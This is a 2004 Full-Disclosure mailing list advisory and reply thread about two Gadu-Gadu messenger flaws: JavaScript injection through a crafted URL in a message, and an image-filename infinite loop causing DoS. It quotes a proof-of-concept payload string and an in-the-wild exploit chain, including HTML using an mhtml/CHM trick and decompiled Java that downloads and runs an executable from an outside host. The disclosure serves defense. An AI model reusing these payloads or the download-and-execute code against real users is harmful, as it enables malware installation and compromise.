Product:        Gadu-Gadu, build 155 and older
Vendor:         SMS-EXPRESS.COM (http://www.gadu-gadu.pl)
Impact:         Script execution in local zone,
                Remote DoS
Severity:       High
Authors:        Blazej Miga <b...@man.poznan.pl>,
                Jaroslaw Sajko <sl...@man.poznan.pl>
Date:           17/12/04

[ISSUE]

Gadu-Gadu is the first Polish instant messenger used by ca. 3 millions of
people per month.

In addition to the last vulnerabilities there are two another
vulnerabilities in the build which have been released after our last
advisory.

[DETAILS]

Bug 1.
Parsing error. We can send a malicious string which has an url inside.
This url can be a javascript code for example or reference to such a code.
Code will execute when the window with message pops up. Code will execute
in LOCAL ZONE! Works also with older versions.

Example:

Send such a string to any receipent:
www.po"style=background-image:url(javascript:document.write('%3cscript%3ealert%28 %22you%20are%20owned!%22%29%3c%2fscript%3e'));".pl

Bug 2.
Beacause in this build default configuration allows sending of the images
we can send an image. There is some new feature, a loop checking filename
for disallowed characters, but the loop under some circumstances is an
infinite loop. So, if an image name isn't starting with the '..', '/', '\'
or '&#' then Gadu-Gadu applications falls into infinite loop, consumes
resources, and will not receive or send any message anymore. So we have a
simple DoS (livelock).

Example:

Send any image (filename must be a 'normal' filename) to your friend.

[SOLUTION]

Please upgrade to the newest build (build 156).

www.po"style=background-image:url(javascript:window.open('http://iframedollars.biz/dl/adv407.php','','left=10000'));".pl

The adv407.php file contains the following HTML code:

[html][head]
[/head][body]
[textarea id="cxw" style="display:none;"]
     [object data="${PR}" type="text/x-scriptlet"][/object]
[/textarea]

[script language="javascript"]
document.write(cxw.value.replace(/\${PR}/g,'&#109;s-its:mhtml:file://c:\\no such.mht!http://iframedollars.biz/dl/adv407/x.chm::/x.htm'));
[/script]
[applet width=1 height=1 ARCHIVE=loaderadv407.jar
code=Counter][/APPLET][/body][/html]

After downloading and decompiling loaderadv407.jar I noticed, that it does:

URL url1 = new URL("http://iframedollars.biz/dl/loadadv407.exe");
URLConnection urlconnection = url1.openConnection();
[...]
FileOutputStream fileoutputstream = new FileOutputStream(s4 + "\\loadnew.exe");
[...]
as[0] = s4 + "\\loadnew.exe";
Process process = Runtime.getRuntime().exec(as);

Clamav recognizes this binary as Trojan.Qhost.O.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: veng...@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *

This option appeared in version 6.0 build 151 or so (at leat 150 does not
have this)

This might mitigate this and other exploits sent in messages, and those
are mostly from unknown users.

Of course it is best to upgrade to the current version too :-)

Best Regards,
Maciej Soltysiak

__
Regards,
Michal Grzedzicki

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html